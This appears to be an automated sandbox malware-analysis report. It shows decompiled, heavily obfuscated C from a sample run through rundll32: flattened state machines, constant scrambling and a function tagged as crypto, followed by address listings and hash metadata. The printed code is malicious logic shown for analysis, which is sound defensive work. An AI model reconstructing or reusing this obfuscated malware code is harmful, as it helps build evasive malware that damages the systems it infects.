				_v176 = _v176 ^ 0x1d3e4f45;
				_v176 = _v176 << 4;
				_v176 = _v176 ^ 0xdbb17ead;
				_v56 = 0x621504;
				_v56 = _v56 + 0x6ed1;
				_v56 = _v56 ^ 0x006a4e76;
				_v244 = 0x9c5408;
				_v244 = _v244 | 0xf9568eed;
				_v244 = _v244 + 0x5010;
				_v244 = _v244 / _t911;
				_v244 = _v244 ^ 0x041668c2;
				_v252 = 0xb42276;
				_v252 = _v252 + 0xa961;
				_v252 = _v252 + 0xdc70;
				_v252 = _v252 ^ 0x05685821;
				_v252 = _v252 ^ 0x05d7e4aa;
				_v260 = 0xd51767;
				_v260 = _v260 * 0x31;
				_v260 = _v260 << 0xc;
				_v260 = _v260 << 0xf;
				_v260 = _v260 ^ 0xb80dad1b;
				_v280 = 0xeb0bae;
				_v280 = _v280 | 0x0e7dba98;
				_v280 = _v280 << 6;
				_t912 = 0x26;
				_v280 = _v280 / _t912;
				_v280 = _v280 ^ 0x050e5033;
				_v188 = 0x4bf18;
				_v188 = _v188 * 0x2e;
				_v188 = _v188 | 0xf176dffe;
				_v188 = _v188 ^ 0xf1f57857;
				_v96 = 0x6c4fa9;
				_v96 = _v96 + 0x1fcf;
				_v96 = _v96 ^ 0x00693444;
				_v148 = 0xfd06aa;
				_v148 = _v148 >> 1;
				_v148 = _v148 << 0xc;
				_v148 = _v148 ^ 0xe83e1d17;
				_v156 = 0xd0b75a;
				_v156 = _v156 + 0xffff0c56;
				_v156 = _v156 * 0x3c;
				_v156 = _v156 ^ 0x30b9846f;
				_v288 = 0xd0c6e5;
				_v288 = _v288 >> 0xc;
				_v288 = _v288 ^ 0x0000ba9d;
				_v292 = 0x631535;
				_v292 = _v292 >> 8;
				_v292 = _v292 * 0x1e;
				_v292 = _v292 ^ 0x000d3f85;
				_v296 = 0x662a0d;
				_v296 = _v296 + 0x95ba;
				_v296 = _v296 >> 7;
				_v296 = _v296 ^ 0xe8c154cb;
				_v296 = _v296 ^ 0xe8c95b3b;
				_v140 = 0x555820;
				_v140 = _v140 << 4;
				_v140 = _v140 | 0xc7d2a78c;
				_v140 = _v140 ^ 0xc7df0fda;
				_t913 = _v20;
				_t921 = _v20;
				while(1) {
					L1:
					while(1) {
						_t784 = _v236;
						while(1) {
							L3:
							_t925 = _t914 - 0x83eeb0d;
							if(_t925 <= 0) {
								break;
							}
							__eflags = _t914 - 0x969dc48;
							if(_t914 == 0x969dc48) {
								E00190411(_t784, _v148, _v156, _v288);
								_t914 = 0x7ec14ff;
								L40:
								_t829 = _a24;
								_t884 = 0x3d0a345;
								L41:
								__eflags = _t914 - 0xa326727;
								if(__eflags == 0) {
									L11:
									return _t827;
								}
								_t784 = _v236;
								continue;
							}
							__eflags = _t914 - 0x9d261fa;
							if(_t914 == 0x9d261fa) {
								_t833 =  *_t829;
								__eflags = _t833;
								if(_t833 == 0) {
									_t787 = 0;
									__eflags = 0;
								} else {
									_t787 = _a24[1];
								}
								E0018BD01(_v56, _t913, _t833, _v244, _v252, _t787, _v260, _a20);
								_t923 =  &(_t923[7]);
								asm("sbb esi, esi");
								_t914 = (_t914 & 0xf886a69e) + 0xe7d57af;
								L13:
								_t829 = _a24;
								goto L1;
							}
							__eflags = _t914 - 0xd1f742e;
							if(_t914 == 0xd1f742e) {
								_push(_t829);
								_t791 = E001890DB(_v72, _t829, _v268, _t829, _v276, _v80, _v88);
								_t921 = _t791;
								__eflags = _t791;
								_t914 =  !=  ? 0x266034b : 0xa326727;
								E001768DE(_v164, _v172, _v208, _v64, 0);
								_t923 =  &(_t923[0xa]);
								goto L40;
							}
							__eflags = _t914 - 0xe7d57af;
							if(_t914 == 0xe7d57af) {
								_t703 =  &_v96; // 0x693444
								E00190411(_t913, _v280, _v188,  *_t703);
								L33:
								_t914 = 0x969dc48;
								goto L13;
							}
							__eflags = _t914 - 0xef78d61;
							if(__eflags != 0) {
								goto L41;
							}
							_t914 = 0xd1f742e;
						}
						if(_t925 == 0) {
							_t914 = 0xef78d61;
							goto L3;
						}
						if(_t914 == 0xb94cb2) {
							__eflags = E00190867(_t913, _a28);
							_t914 = 0xe7d57af;
							_t797 = 1;
							_t827 =  !=  ? _t797 : _t827;
							goto L13;
						}
						if(_t914 == 0x266034b) {
							_t695 =  &_v112; // 0x306e5b
							_t784 = E001800A0(_t921, _t829, _t829, _v248, _v196, _t829, _v104, _a36,  *_t695, _v284, _v204, _v116, _v144, _a4);
							_t829 = _a24;
							_t923 =  &(_t923[0xd]);
							__eflags = _t784;
							_v236 = _t784;
							_t884 = 0x3d0a345;
							_t914 =  !=  ? 0x3d0a345 : 0x7ec14ff;
							goto L3;
						}
						if(_t914 == _t884) {
							__eflags =  *_t829;
							if(__eflags == 0) {
								_t841 = _v24;
							} else {
								_push(_v132);
								_push(_v200);
								_push(0x1712fc);
								_t841 = E0017AB66(_v228, _v232, __eflags);
								_t923 =  &(_t923[3]);
								_v24 = _t841;
							}
							_t657 =  &_v100; // 0xe65150
							_t807 = _v40 | _v48 | _v60 | _v212 | _v124 | _v108 | _v216 | _v120 |  *_t657;
							_t919 = _v12 & 1;
							__eflags = _t919;
							if(_t919 != 0) {
								__eflags = _t807;
							}
							_push(_t841);
							_t808 = E00190349(_t841, _v240, _v16, _t841, _t841, _v192, _v272, _t807, _v236, _t841, _v52, _v160);
							_t913 = _t808;
							E0017AE03(_v36, _v92, _v128, _v24);
							_t923 =  &(_t923[0xd]);
							__eflags = _t808;
							if(__eflags == 0) {
								goto L33;
							} else {
								_v68 = 1;
								E0017B6D1(_v44, _v264, _v184, 4, _v84,  &_v68, _t913);
								_t923 =  &(_t923[5]);
								__eflags = _t919;
								if(__eflags != 0) {
									E001775A5(_t913, _v256, _v152, _v76, _v224,  &_v68,  &_v20);
									_t682 =  &_v68;
									 *_t682 = _v68 | _v28;
									__eflags =  *_t682;
									E0017B6D1(_v168, _v32, _v136, _v20, _v176,  &_v68, _t913);
									_t923 =  &(_t923[0xa]);
								}
								_t914 = 0x9d261fa;
								goto L13;
							}
						}
						if(_t914 == 0x703fe4d) {
							__eflags = E001784B8(_t913, _v220, __eflags) - _v180;
							_t914 =  ==  ? 0xb94cb2 : 0xe7d57af;
							__eflags = 0xe7d57af;
							goto L13;
						}
						if(_t914 != 0x7ec14ff) {
							goto L41;
						}
						E00190411(_t921, _v292, _v296, _v140);
						goto L11;
					}
				}
			}










































































































                                                                                                                      0x00187bd4
                                                                                                                      0x00187be4
                                                                                                                      0x00187bf0
                                                                                                                      0x00187bf7
                                                                                                                      0x00187bfe
                                                                                                                      0x00187c05
                                                                                                                      0x00187c0c
                                                                                                                      0x00187c0d
                                                                                                                      0x00187c14
                                                                                                                      0x00187c1b
                                                                                                                      0x00187c22
                                                                                                                      0x00187c29
                                                                                                                      0x00187c30
                                                                                                                      0x00187c31
                                                                                                                      0x00187c32
                                                                                                                      0x00187c33
                                                                                                                      0x00187c38
                                                                                                                      0x00187c42
                                                                                                                      0x00187c4d
                                                                                                                      0x00187c50
                                                                                                                      0x00187c5a
                                                                                                                      0x00187c61
                                                                                                                      0x00187c68
                                                                                                                      0x00187c6f
                                                                                                                      0x00187c72
                                                                                                                      0x00187c76
                                                                                                                      0x00187c7e
                                                                                                                      0x00187c86
                                                                                                                      0x00187c8e
                                                                                                                      0x00187c96
                                                                                                                      0x00187ca6
                                                                                                                      0x00187cae
                                                                                                                      0x00187cb1
                                                                                                                      0x00187cb5
                                                                                                                      0x00187cbd
                                                                                                                      0x00187cc8
                                                                                                                      0x00187cd0
                                                                                                                      0x00187cd8
                                                                                                                      0x00187ce3
                                                                                                                      0x00187cee
                                                                                                                      0x00187cf9
                                                                                                                      0x00187d04
                                                                                                                      0x00187d0f
                                                                                                                      0x00187d1a
                                                                                                                      0x00187d25
                                                                                                                      0x00187d2d
                                                                                                                      0x00187d35
                                                                                                                      0x00187d3d
                                                                                                                      0x00187d42
                                                                                                                      0x00187d4a
                                                                                                                      0x00187d55
                                                                                                                      0x00187d60
                                                                                                                      0x00187d6b
                                                                                                                      0x00187d76
                                                                                                                      0x00187d81
                                                                                                                      0x00187d89
                                                                                                                      0x00187d94
                                                                                                                      0x00187d9c
                                                                                                                      0x00187da4
                                                                                                                      0x00187db1
                                                                                                                      0x00187db5
                                                                                                                      0x00187dbd
                                                                                                                      0x00187dc8
                                                                                                                      0x00187dd5
                                                                                                                      0x00187de0
                                                                                                                      0x00187deb
                                                                                                                      0x00187df6
                                                                                                                      0x00187e01
                                                                                                                      0x00187e0c
                                                                                                                      0x00187e14
                                                                                                                      0x00187e1f
                                                                                                                      0x00187e2a
                                                                                                                      0x00187e35
                                                                                                                      0x00187e40
                                                                                                                      0x00187e4b
                                                                                                                      0x00187e56
                                                                                                                      0x00187e61
                                                                                                                      0x00187e76
                                                                                                                      0x00187e79
                                                                                                                      0x00187e80
                                                                                                                      0x00187e8b
                                                                                                                      0x00187e96
                                                                                                                      0x00187ea1
                                                                                                                      0x00187ea9
                                                                                                                      0x00187eb4
                                                                                                                      0x00187ebf
                                                                                                                      0x00187eca
                                                                                                                      0x00187ed5
                                                                                                                      0x00187ee0
                                                                                                                      0x00187eeb
                                                                                                                      0x00187ef6
                                                                                                                      0x00187f01
                                                                                                                      0x00187f11
                                                                                                                      0x00187f15
                                                                                                                      0x00187f1d
                                                                                                                      0x00187f22
                                                                                                                      0x00187f2a
                                                                                                                      0x00187f36
                                                                                                                      0x00187f3b
                                                                                                                      0x00187f41
                                                                                                                      0x00187f49
                                                                                                                      0x00187f4e
                                                                                                                      0x00187f56
                                                                                                                      0x00187f62
                                                                                                                      0x00187f67
                                                                                                                      0x00187f6d
                                                                                                                      0x00187f75
                                                                                                                      0x00187f7d
                                                                                                                      0x00187f85
                                                                                                                      0x00187f8d
                                                                                                                      0x00187f92
                                                                                                                      0x00187f9e
                                                                                                                      0x00187fa1
                                                                                                                      0x00187fa5
                                                                                                                      0x00187fad
                                                                                                                      0x00187fba
                                                                                                                      0x00187fbe
                                                                                                                      0x00187fc3
                                                                                                                      0x00187fcb
                                                                                                                      0x00187fd3
                                                                                                                      0x00187fdb
                                                                                                                      0x00187fe3
                                                                                                                      0x00187feb
                                                                                                                      0x00187ff3
                                                                                                                      0x00187ffb
                                                                                                                      0x00188003
                                                                                                                      0x00188008
                                                                                                                      0x0018800e
                                                                                                                      0x00188016
                                                                                                                      0x0018801e
                                                                                                                      0x00188022
                                                                                                                      0x0018802a
                                                                                                                      0x00188037
                                                                                                                      0x00188038
                                                                                                                      0x0018803c
                                                                                                                      0x00188044
                                                                                                                      0x0018804c
                                                                                                                      0x00188054
                                                                                                                      0x0018805c
                                                                                                                      0x00188061
                                                                                                                      0x00188069
                                                                                                                      0x00188071
                                                                                                                      0x00188079
                                                                                                                      0x0018807e
                                                                                                                      0x00188083
                                                                                                                      0x0018808b
                                                                                                                      0x00188093
                                                                                                                      0x001880a0
                                                                                                                      0x001880a4
                                                                                                                      0x001880ac
                                                                                                                      0x001880b4
                                                                                                                      0x001880bc
                                                                                                                      0x001880c4
                                                                                                                      0x001880cc
                                                                                                                      0x001880d4
                                                                                                                      0x001880dc
                                                                                                                      0x001880e1
                                                                                                                      0x001880e9
                                                                                                                      0x001880f1
                                                                                                                      0x001880f9
                                                                                                                      0x00188103
                                                                                                                      0x00188107
                                                                                                                      0x0018810f
                                                                                                                      0x00188117
                                                                                                                      0x00188122
                                                                                                                      0x0018812d
                                                                                                                      0x00188138
                                                                                                                      0x00188143
                                                                                                                      0x0018814b
                                                                                                                      0x00188156
                                                                                                                      0x00188161
                                                                                                                      0x00188169
                                                                                                                      0x00188170
                                                                                                                      0x00188178
                                                                                                                      0x0018817f
                                                                                                                      0x0018818a
                                                                                                                      0x0018819e
                                                                                                                      0x001881a5
                                                                                                                      0x001881b0
                                                                                                                      0x001881bb
                                                                                                                      0x001881c3
                                                                                                                      0x001881c8
                                                                                                                      0x001881d0
                                                                                                                      0x001881d8
                                                                                                                      0x001881e3
                                                                                                                      0x001881eb
                                                                                                                      0x001881f6
                                                                                                                      0x001881fe
                                                                                                                      0x00188206
                                                                                                                      0x0018820e
                                                                                                                      0x00188216
                                                                                                                      0x0018821e
                                                                                                                      0x00188226
                                                                                                                      0x0018822e
                                                                                                                      0x00188233
                                                                                                                      0x0018823b
                                                                                                                      0x00188246
                                                                                                                      0x00188250
                                                                                                                      0x0018825b
                                                                                                                      0x00188270
                                                                                                                      0x00188271
                                                                                                                      0x00188278
                                                                                                                      0x00188283
                                                                                                                      0x00188290
                                                                                                                      0x00188294
                                                                                                                      0x00188299
                                                                                                                      0x0018829e
                                                                                                                      0x001882a6
                                                                                                                      0x001882ae
                                                                                                                      0x001882b6
                                                                                                                      0x001882be
                                                                                                                      0x001882c6
                                                                                                                      0x001882d1
                                                                                                                      0x001882d9
                                                                                                                      0x001882e4
                                                                                                                      0x001882ef
                                                                                                                      0x001882fc
                                                                                                                      0x00188300
                                                                                                                      0x00188308
                                                                                                                      0x00188310
                                                                                                                      0x00188318
                                                                                                                      0x00188320
                                                                                                                      0x00188328
                                                                                                                      0x0018832d
                                                                                                                      0x00188335
                                                                                                                      0x0018833d
                                                                                                                      0x00188345
                                                                                                                      0x0018834a
                                                                                                                      0x00188352
                                                                                                                      0x0018835a
                                                                                                                      0x0018836d
                                                                                                                      0x00188374
                                                                                                                      0x0018837c
                                                                                                                      0x00188387
                                                                                                                      0x0018838f
                                                                                                                      0x00188397
                                                                                                                      0x0018839f
                                                                                                                      0x001883a7
                                                                                                                      0x001883af
                                                                                                                      0x001883bc
                                                                                                                      0x001883c5
                                                                                                                      0x001883c9
                                                                                                                      0x001883d1
                                                                                                                      0x001883d9
                                                                                                                      0x001883e1
                                                                                                                      0x001883e9
                                                                                                                      0x001883f1
                                                                                                                      0x001883f9
                                                                                                                      0x00188404
                                                                                                                      0x0018840c
                                                                                                                      0x00188417
                                                                                                                      0x00188422
                                                                                                                      0x00188435
                                                                                                                      0x0018843c
                                                                                                                      0x00188447
                                                                                                                      0x00188452
                                                                                                                      0x0018845a
                                                                                                                      0x00188465
                                                                                                                      0x00188470
                                                                                                                      0x0018847b
                                                                                                                      0x00188486
                                                                                                                      0x00188499
                                                                                                                      0x001884a0
                                                                                                                      0x001884a8
                                                                                                                      0x001884b3
                                                                                                                      0x001884c1
                                                                                                                      0x001884ce
                                                                                                                      0x001884d1
                                                                                                                      0x001884da
                                                                                                                      0x001884de
                                                                                                                      0x001884e6
                                                                                                                      0x001884fc
                                                                                                                      0x0018850b
                                                                                                                      0x0018850e
                                                                                                                      0x00188515
                                                                                                                      0x00188520
                                                                                                                      0x00188536
                                                                                                                      0x0018853d
                                                                                                                      0x00188548
                                                                                                                      0x00188550
                                                                                                                      0x0018855c
                                                                                                                      0x00188561
                                                                                                                      0x00188567
                                                                                                                      0x0018856c
                                                                                                                      0x00188574
                                                                                                                      0x0018857f
                                                                                                                      0x0018858a
                                                                                                                      0x00188595
                                                                                                                      0x001885a2
                                                                                                                      0x001885a3
                                                                                                                      0x001885a7
                                                                                                                      0x001885ac
                                                                                                                      0x001885b4
                                                                                                                      0x001885bc
                                                                                                                      0x001885c7
                                                                                                                      0x001885d2
                                                                                                                      0x001885dd
                                                                                                                      0x001885e8
                                                                                                                      0x001885fb
                                                                                                                      0x00188602
                                                                                                                      0x0018860d
                                                                                                                      0x00188618
                                                                                                                      0x00188623
                                                                                                                      0x0018862b
                                                                                                                      0x00188636
                                                                                                                      0x00188641
                                                                                                                      0x0018864c
                                                                                                                      0x00188657
                                                                                                                      0x0018865f
                                                                                                                      0x00188667
                                                                                                                      0x00188675
                                                                                                                      0x00188679
                                                                                                                      0x00188681
                                                                                                                      0x00188689
                                                                                                                      0x00188691
                                                                                                                      0x00188699
                                                                                                                      0x001886a1
                                                                                                                      0x001886a9
                                                                                                                      0x001886b6
                                                                                                                      0x001886ba
                                                                                                                      0x001886bf
                                                                                                                      0x001886c4
                                                                                                                      0x001886cc
                                                                                                                      0x001886d4
                                                                                                                      0x001886dc
                                                                                                                      0x001886e9
                                                                                                                      0x001886ec
                                                                                                                      0x001886f0
                                                                                                                      0x001886f8
                                                                                                                      0x00188705
                                                                                                                      0x00188709
                                                                                                                      0x00188711
                                                                                                                      0x00188719
                                                                                                                      0x00188724
                                                                                                                      0x0018872f
                                                                                                                      0x0018873a
                                                                                                                      0x00188745
                                                                                                                      0x0018874c
                                                                                                                      0x00188754
                                                                                                                      0x0018875f
                                                                                                                      0x0018876a
                                                                                                                      0x0018877d
                                                                                                                      0x00188784
                                                                                                                      0x0018878f
                                                                                                                      0x00188797
                                                                                                                      0x0018879c
                                                                                                                      0x001887a4
                                                                                                                      0x001887ac
                                                                                                                      0x001887b6
                                                                                                                      0x001887ba
                                                                                                                      0x001887c2
                                                                                                                      0x001887ca
                                                                                                                      0x001887d2
                                                                                                                      0x001887d7
                                                                                                                      0x001887df
                                                                                                                      0x001887e7
                                                                                                                      0x001887f2
                                                                                                                      0x001887fa
                                                                                                                      0x00188805
                                                                                                                      0x00188810
                                                                                                                      0x00188817
                                                                                                                      0x0018881e
                                                                                                                      0x0018881e
                                                                                                                      0x00188823
                                                                                                                      0x00188823
                                                                                                                      0x00188827
                                                                                                                      0x00188827
                                                                                                                      0x00188827
                                                                                                                      0x0018882d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00188ae9
                                                                                                                      0x00188aef
                                                                                                                      0x00188c0c
                                                                                                                      0x00188c13
                                                                                                                      0x00188c18
                                                                                                                      0x00188c18
                                                                                                                      0x00188c1f
                                                                                                                      0x00188c24
                                                                                                                      0x00188c24
                                                                                                                      0x00188c2a
                                                                                                                      0x00188886
                                                                                                                      0x0018888f
                                                                                                                      0x0018888f
                                                                                                                      0x00188823
                                                                                                                      0x00000000
                                                                                                                      0x00188823
                                                                                                                      0x00188af5
                                                                                                                      0x00188afb
                                                                                                                      0x00188baa
                                                                                                                      0x00188bac
                                                                                                                      0x00188bae
                                                                                                                      0x00188bbc
                                                                                                                      0x00188bbc
                                                                                                                      0x00188bb0
                                                                                                                      0x00188bb7
                                                                                                                      0x00188bb7
                                                                                                                      0x00188bdb
                                                                                                                      0x00188be0
                                                                                                                      0x00188be5
                                                                                                                      0x00188bed
                                                                                                                      0x001888b3
                                                                                                                      0x001888b3
                                                                                                                      0x00000000
                                                                                                                      0x001888b3
                                                                                                                      0x00188b01
                                                                                                                      0x00188b07
                                                                                                                      0x00188b4c
                                                                                                                      0x00188b6c
                                                                                                                      0x00188b7a
                                                                                                                      0x00188b8f
                                                                                                                      0x00188b9d
                                                                                                                      0x00188ba0
                                                                                                                      0x00188ba5
                                                                                                                      0x00000000
                                                                                                                      0x00188ba5
                                                                                                                      0x00188b09
                                                                                                                      0x00188b0f
                                                                                                                      0x00188b27
                                                                                                                      0x00188b3b
                                                                                                                      0x00188b42
                                                                                                                      0x00188b42
                                                                                                                      0x00000000
                                                                                                                      0x00188b42
                                                                                                                      0x00188b11
                                                                                                                      0x00188b17
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00188b1d
                                                                                                                      0x00188b1d
                                                                                                                      0x00188833
                                                                                                                      0x00188adf
                                                                                                                      0x00000000
                                                                                                                      0x00188adf
                                                                                                                      0x00188840
                                                                                                                      0x00188acd
                                                                                                                      0x00188acf
                                                                                                                      0x00188ad6
                                                                                                                      0x00188ad7
                                                                                                                      0x00000000
                                                                                                                      0x00188ad7
                                                                                                                      0x0018884d
                                                                                                                      0x00188a73
                                                                                                                      0x00188a98
                                                                                                                      0x00188a9d
                                                                                                                      0x00188aa4
                                                                                                                      0x00188aa7
                                                                                                                      0x00188aa9
                                                                                                                      0x00188ab2
                                                                                                                      0x00188ab7
                                                                                                                      0x00000000
                                                                                                                      0x00188ab7
                                                                                                                      0x00188855
                                                                                                                      0x001888bf
                                                                                                                      0x001888c2
                                                                                                                      0x001888ef
                                                                                                                      0x001888c4
                                                                                                                      0x001888c4
                                                                                                                      0x001888cb
                                                                                                                      0x001888d7
                                                                                                                      0x001888e1
                                                                                                                      0x001888e3
                                                                                                                      0x001888e6
                                                                                                                      0x001888e6
                                                                                                                      0x00188932
                                                                                                                      0x00188932
                                                                                                                      0x00188939
                                                                                                                      0x00188939
                                                                                                                      0x0018893b
                                                                                                                      0x0018893d
                                                                                                                      0x0018893d
                                                                                                                      0x00188942
                                                                                                                      0x0018896f
                                                                                                                      0x00188974
                                                                                                                      0x00188993
                                                                                                                      0x00188998
                                                                                                                      0x0018899b
                                                                                                                      0x0018899d
                                                                                                                      0x00000000
                                                                                                                      0x001889a3
                                                                                                                      0x001889a7
                                                                                                                      0x001889d1
                                                                                                                      0x001889d6
                                                                                                                      0x001889d9
                                                                                                                      0x001889db
                                                                                                                      0x00188a05
                                                                                                                      0x00188a11
                                                                                                                      0x00188a11
                                                                                                                      0x00188a11
                                                                                                                      0x00188a44
                                                                                                                      0x00188a49
                                                                                                                      0x00188a49
                                                                                                                      0x00188a4c
                                                                                                                      0x00000000
                                                                                                                      0x00188a4c
                                                                                                                      0x0018899d
                                                                                                                      0x0018885d
                                                                                                                      0x001888a9
                                                                                                                      0x001888b0
                                                                                                                      0x001888b0
                                                                                                                      0x00000000
                                                                                                                      0x001888b0
                                                                                                                      0x00188865
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018887c
                                                                                                                      0x00000000
                                                                                                                      0x00188882
                                                                                                                      0x00188823

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: *f$ XU$"f$'g2$'g2$*^b$+81$D4iPQ$Jb$M#_8$PQ$[n0D4iPQ$a+$lu$pg[$vNj$wrz$r/$?n
                                                                                                                      • API String ID: 0-930466666
                                                                                                                      • Opcode ID: 4a90b446259e682a29ab986ae5e44a7484e82fb05ee948cb5da582645d149cba
                                                                                                                      • Instruction ID: 21a2b70a97cf1a18f67d343ca449fa8791e378c6c74ca4f1953bc3b16f2df081
                                                                                                                      • Opcode Fuzzy Hash: 4a90b446259e682a29ab986ae5e44a7484e82fb05ee948cb5da582645d149cba
                                                                                                                      • Instruction Fuzzy Hash: B08200B15093818FD3B9CF25D54AA8FBBE2BBC4708F10891DE1DA96260D7B08949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017CFCE Relevance: 18.2, Strings: 14, Instructions: 746COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0017CFCE(intOrPtr __ecx) {
				char _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				char _v68;
				intOrPtr _v72;
				char _v76;
				char _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				unsigned int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				void* _t878;
				intOrPtr _t883;
				intOrPtr _t885;
				void* _t887;
				void* _t891;
				void* _t897;
				intOrPtr _t905;
				intOrPtr _t911;
				intOrPtr _t912;
				void* _t913;
				signed int _t915;
				char _t918;
				void* _t927;
				signed int _t933;
				signed int _t934;
				signed int _t935;
				signed int _t936;
				signed int _t937;
				signed int _t938;
				signed int _t939;
				signed int _t940;
				signed int _t941;
				signed int _t942;
				signed int _t943;
				signed int _t944;
				signed int _t945;
				signed int _t946;
				signed int _t947;
				signed int _t948;
				signed int _t949;
				void* _t950;
				intOrPtr _t967;
				intOrPtr _t971;
				void* _t1030;
				intOrPtr _t1032;
				intOrPtr _t1036;
				signed int _t1052;
				void* _t1053;
				intOrPtr _t1055;
				signed int _t1056;
				signed int _t1057;
				void* _t1058;
				void* _t1063;
				signed int* _t1065;
				void* _t1070;

				_t1065 =  &_v428;
				_v368 = 0xff2aef;
				_v368 = _v368 ^ 0x94d7aa8a;
				_v72 = __ecx;
				_t1063 = 0;
				_t933 = 0x71;
				_v368 = _v368 / _t933;
				_v368 = _v368 >> 0x10;
				_t927 = 0xe23336a;
				_v368 = _v368 ^ 0x4d424504;
				_v360 = 0xd1872;
				_v360 = _v360 >> 1;
				_v360 = _v360 ^ 0xf196af6a;
				_v360 = _v360 >> 2;
				_v360 = _v360 ^ 0x3c6408d5;
				_v176 = 0xb206d0;
				_t934 = 0x55;
				_v176 = _v176 * 0x7f;
				_v176 = _v176 ^ 0x58516130;
				_v128 = 0x74c3bb;
				_v128 = _v128 ^ 0x08cc5173;
				_v128 = _v128 ^ 0x08b892c8;
				_v324 = 0x9db377;
				_t935 = 0x54;
				_v324 = _v324 / _t934;
				_v324 = _v324 >> 9;
				_v324 = _v324 ^ 0x000000ed;
				_v112 = 0x5e8d48;
				_v112 = _v112 / _t935;
				_v112 = _v112 ^ 0x00012028;
				_v224 = 0x5fd119;
				_v224 = _v224 | 0x5d78ffc1;
				_v224 = _v224 ^ 0x83601dcb;
				_v224 = _v224 ^ 0xde1fe212;
				_v284 = 0x3ef093;
				_t1056 = 0x2f;
				_v284 = _v284 * 0x78;
				_v284 = _v284 ^ 0x8f55145b;
				_v284 = _v284 ^ 0x92d5d0b3;
				_v384 = 0xed432;
				_v384 = _v384 << 5;
				_v384 = _v384 | 0x363f046e;
				_v384 = _v384 + 0xffff62d1;
				_v384 = _v384 ^ 0x37fee93f;
				_v140 = 0x433cbb;
				_v140 = _v140 + 0xffffaad9;
				_v140 = _v140 ^ 0x0042e794;
				_v336 = 0xcb983b;
				_v336 = _v336 >> 1;
				_v336 = _v336 << 4;
				_v336 = _v336 | 0x18349d49;
				_v336 = _v336 ^ 0x1e7cddd9;
				_v116 = 0xdf1b2;
				_v116 = _v116 | 0x5d84461c;
				_v116 = _v116 ^ 0x5d8df7be;
				_v352 = 0x1a6928;
				_v352 = _v352 + 0xb4e6;
				_v352 = _v352 + 0xd244;
				_v352 = _v352 + 0xffffe4cf;
				_v352 = _v352 ^ 0x001bd501;
				_v216 = 0x4eea53;
				_v216 = _v216 / _t1056;
				_v216 = _v216 + 0xffff2d58;
				_v216 = _v216 ^ 0x000cf508;
				_v136 = 0xd4127c;
				_t936 = 0xd;
				_v136 = _v136 * 0x71;
				_v136 = _v136 ^ 0x5d98049d;
				_v84 = 0x5dec0;
				_v84 = _v84 + 0xffff1ffb;
				_v84 = _v84 ^ 0x00030d01;
				_v144 = 0x51c367;
				_v144 = _v144 | 0x0242a62f;
				_v144 = _v144 ^ 0x025bd945;
				_v232 = 0x88ff65;
				_v232 = _v232 >> 3;
				_v232 = _v232 ^ 0xa25d5547;
				_v232 = _v232 ^ 0xa24a7ec6;
				_v272 = 0xc81b6f;
				_v272 = _v272 | 0x487ad3f8;
				_v272 = _v272 ^ 0xba29c57d;
				_v272 = _v272 ^ 0xf2d9b36a;
				_v348 = 0xc83c7a;
				_v348 = _v348 ^ 0xff1a377f;
				_v348 = _v348 << 6;
				_v348 = _v348 ^ 0x4baa6a66;
				_v348 = _v348 ^ 0xbf2398db;
				_v388 = 0x1aaad9;
				_v388 = _v388 >> 0xf;
				_v388 = _v388 * 0x2b;
				_v388 = _v388 | 0xe773ca21;
				_v388 = _v388 ^ 0xe773499c;
				_v200 = 0x8f1511;
				_v200 = _v200 + 0x4dd0;
				_v200 = _v200 ^ 0xe54041ed;
				_v200 = _v200 ^ 0xe5c111e7;
				_v264 = 0x8d8e04;
				_v264 = _v264 / _t936;
				_t937 = 0x4c;
				_v264 = _v264 * 0x55;
				_v264 = _v264 ^ 0x039811bf;
				_v96 = 0xdcd85e;
				_v96 = _v96 / _t937;
				_v96 = _v96 ^ 0x000f7a5c;
				_v428 = 0x18f383;
				_v428 = _v428 + 0xffff3777;
				_v428 = _v428 >> 1;
				_v428 = _v428 + 0xf3dd;
